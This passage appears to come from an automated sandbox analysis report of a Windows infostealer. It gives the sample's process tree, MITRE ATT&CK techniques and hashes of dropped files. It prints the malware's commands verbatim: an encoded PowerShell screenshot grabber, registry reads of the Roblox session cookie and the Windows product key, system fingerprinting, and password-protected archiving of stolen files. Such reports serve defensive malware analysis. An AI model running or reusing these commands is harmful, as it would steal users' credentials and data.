cwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4824
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0p5cj3rn\0p5cj3rn.cmdline"
        5⤵
        
        PID:1752
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDEC.tmp" "c:\Users\Admin\AppData\Local\Temp\0p5cj3rn\CSCB682CCB5640A4F3D8CAC1567786A825.TMP"
        6⤵
        
        PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1776
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4552
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3396
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\NzBdU.zip" *"
    3⤵
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\_MEI47322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI47322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\NzBdU.zip" *
      4⤵
      Executes dropped EXE
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:796
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e67b7a4d382c8b1625787f0bcae42150

SHA1
cc929958276bc5efa47535055329972f119327c6

SHA256
053d0b08f22ff5121cb832d514195145a55b9a4ca26d1decd446e11b64bef89c

SHA512
3bf0311fe0c57fb9a1976fbeae6d37015736c32c59832252f3bc4c055b2a14c6bcc975dcd63b480d4f520672687a62d5ccd709a6ebdb4566bb83fb081b3f4452

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\0p5cj3rn\0p5cj3rn.dll

Filesize
4KB

MD5
3e7f354b54a7c87d8eefecc5805a4b72

SHA1
f142521230d62d173e1f8b745548844340886991

SHA256
83f7011bc0def7ff9228ef73716cef96c1b588e8c7d5441a4c74688be152d335

SHA512
4d6cc685a84f8be5e71bab6ad7cb8d29f9f6c60dc94daa7bb508e421b6d8a46972eaaa3b8c3620e35aa32488f1ab49676167a1e392950bdd85329caa85cf60d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDDEC.tmp

Filesize
1KB

MD5
5fab4665280e6a65e769e42b04a054c1

SHA1
0f50ffe190d5f55e9cf13c39286631efebf1171d

SHA256
d71d7dca5bb90c9b6a28124208f875df41f75f5381b48e767b1562c1d67cad00

SHA512
404ac566fda39c82a74a48027b47e47508a25694881995842cf8365d81df47bb4407117765a2cafc6b9ace23c5bcd3ad963dc5b0305db1ab01ebeb89b0579dfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_bz2.pyd

Filesize
48KB

MD5
83b5d1943ac896a785da5343614b16bc

SHA1
9d94b7f374030fed7f6e876434907561a496f5d9

SHA256
bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

SHA512
5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_ctypes.pyd

Filesize
58KB

MD5
7ecc651b0bcf9b93747a710d67f6c457

SHA1
ebb6dcd3998af9fff869184017f2106d7a9c18f3

SHA256
b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a

SHA512
1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_decimal.pyd

Filesize
106KB

MD5
0cfe09615338c6450ac48dd386f545fd

SHA1
61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

SHA256
a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

SHA512
42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_hashlib.pyd

Filesize
35KB

MD5
7edb6c172c0e44913e166abb50e6fba6

SHA1
3f8c7d0ff8981d49843372572f93a6923f61e8ed

SHA256
258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

SHA512
2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_lzma.pyd

Filesize
85KB

MD5
71f0b9f90aa4bb5e605df0ea58673578

SHA1
c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

SHA256
d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

SHA512
fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_queue.pyd

Filesize
25KB

MD5
f1e7c157b687c7e041deadd112d61316

SHA1
2a7445173518a342d2e39b19825cf3e3c839a5fe

SHA256
d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339

SHA512
982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_socket.pyd

Filesize
43KB

MD5
57dc6a74a8f2faaca1ba5d330d7c8b4b

SHA1
905d90741342ac566b02808ad0f69e552bb08930

SHA256
5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

SHA512
5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_sqlite3.pyd

Filesize
56KB

MD5
72a0715cb59c5a84a9d232c95f45bf57

SHA1
3ed02aa8c18f793e7d16cc476348c10ce259feb7

SHA256
d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad

SHA512
73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\_ssl.pyd

Filesize
62KB

MD5
8f94142c7b4015e780011c1b883a2b2f

SHA1
c9c3c1277cca1e8fe8db366ca0ecb4a264048f05

SHA256
8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c

SHA512
7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\base_library.zip

Filesize
1.4MB

MD5
1c9a020e8bfc99a77f51c7d5ceb937f1

SHA1
9b2c6f0c4d16ac0b69e5232648b6e6c5df39cd9c

SHA256
2ce10a77f29612f9afd3fb21baaf38162fdc484174aec051a32eeaef28ce8b37

SHA512
98312712c4be133d979b9699e661c451cd8c27ae4c5abc295c359fd857d20b3fde55e6555bdd2230d580903bb230798fba2c72381b263327f5d0820d28ddfbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\blank.aes

Filesize
118KB

MD5
b515c88ed26b779015d2f98a3dc1fdc1

SHA1
82b3e4e532472355f27b5f0372bd5481e950fae7

SHA256
11eaa640522400a1a347ae143651851be1b5f093bb20c09a17ea9ba9b5ea20eb

SHA512
fb63e7b4edcd424690f456cef941affc648a1c535fd6c77cb2e9cc8e742e53afb2416d58fabe26a1291c253c3cd3e33f9bfdefb30998cbc15f2c74c14da17c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\libcrypto-1_1.dll

Filesize
1.1MB

MD5
e5aecaf59c67d6dd7c7979dfb49ed3b0

SHA1
b0a292065e1b3875f015277b90d183b875451450

SHA256
9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

SHA512
145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\libffi-8.dll

Filesize
27KB

MD5
87786718f8c46d4b870f46bcb9df7499

SHA1
a63098aabe72a3ed58def0b59f5671f2fd58650b

SHA256
1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33

SHA512
3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\libssl-1_1.dll

Filesize
203KB

MD5
7bcb0f97635b91097398fd1b7410b3bc

SHA1
7d4fc6b820c465d46f934a5610bc215263ee6d3e

SHA256
abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

SHA512
835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\python311.dll

Filesize
1.6MB

MD5
1e76961ca11f929e4213fca8272d0194

SHA1
e52763b7ba970c3b14554065f8c2404112f53596

SHA256
8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0

SHA512
ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\select.pyd

Filesize
25KB

MD5
938c814cc992fe0ba83c6f0c78d93d3f

SHA1
e7c97e733826e53ff5f1317b947bb3ef76adb520

SHA256
9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e

SHA512
2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\sqlite3.dll

Filesize
607KB

MD5
abe8eec6b8876ddad5a7d60640664f40

SHA1
0b3b948a1a29548a73aaf8d8148ab97616210473

SHA256
26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d

SHA512
de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47322\unicodedata.pyd

Filesize
295KB

MD5
908e8c719267692de04434ab9527f16e

SHA1
5657def35fbd3e5e088853f805eddd6b7b2b3ce9

SHA256
4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239

SHA512
4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dntqqtkt.4xq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   \Common Files\Desktop\ConfirmWait.docx

Filesize
17KB

MD5
85839975ce34e9b5ede3f9c39ff36c85

SHA1
338f1d26210accc9d043fd252b093989674ebb54

SHA256
f14b725440a8bea8698c289b50375095849fb9f9f6921ea3f7e1c4dcaa8383f3

SHA512
6811dcc578ad0e6346c2b285e0bb6ec74409e07e85287ab896ef68db6d4809b76c09a8a5cc0591f7579dab6c1fcb2c894a99ab61ed15befeb7f53f7f0adcfac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   \Common Files\Desktop\GetCopy.jpg

Filesize
721KB

MD5
4c638000c29e28ff2552114280e0b399

SHA1
600919c8628395ecf2843767d21aaaf0123f6ef8

SHA256
e8233eb63a89f05936424c163fc4cfdb67bbf7832a038baf4a759560888ff55f

SHA512
a22d983971334c65c8672825cc096de908aa2e3f21f872a062a6b5053a038da23501543c54ac1afecc2586745b4f37d885a2d5202a2e37cab8599ccbaa12d06d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   \Common Files\Desktop\RedoRestore.docx

Filesize
15KB

MD5
483f7a1e1945af19994afb21d19dee2d

SHA1
cbcf7997cf6b10d913a9b4e714dcacf74b0764b6

SHA256
19cfe34d3ca6ad90a1eec1dd7058379312dcd134c998ce076c91f1491e5f8928

SHA512
562835b0ec1d2ae91886b1ae443ba0bad4763bfda0e938013592dabd5beabdc0de6ad8464c775993b4d3a2cfb5340f6ad282e7f6d2a1f104f3cd2c8fe0c3a23c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   \Common Files\Desktop\ResetProtect.docx

Filesize
17KB

MD5
f43f55c86762c14b14d5a2ae909a7112

SHA1
2d6db221c0c8affea5204c65b526b2492fb132a6

SHA256
487a1eeaf2903975279b5962c2771dfcf0f0fd9d6697fe0e3422df2455879ea7

SHA512
74e254caa394253012374eec3255af03ddc87b6e14c79caeea894c67305cfce2c34f77d0c98f00cacdd521d4466ccf06c59e321006844e89f2618c558a483ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   \Common Files\Desktop\StopAssert.xlsx

Filesize
11KB

MD5
1d836ccb56b520b9b2ef571db490baba

SHA1
96a94c9bdf79a25b361280a5e3cf45c55f615e6c

SHA256
71b99952929351d1aca8036b3ac2e0cb7a75e5bc549d1a41a86eb78b0b739846

SHA512
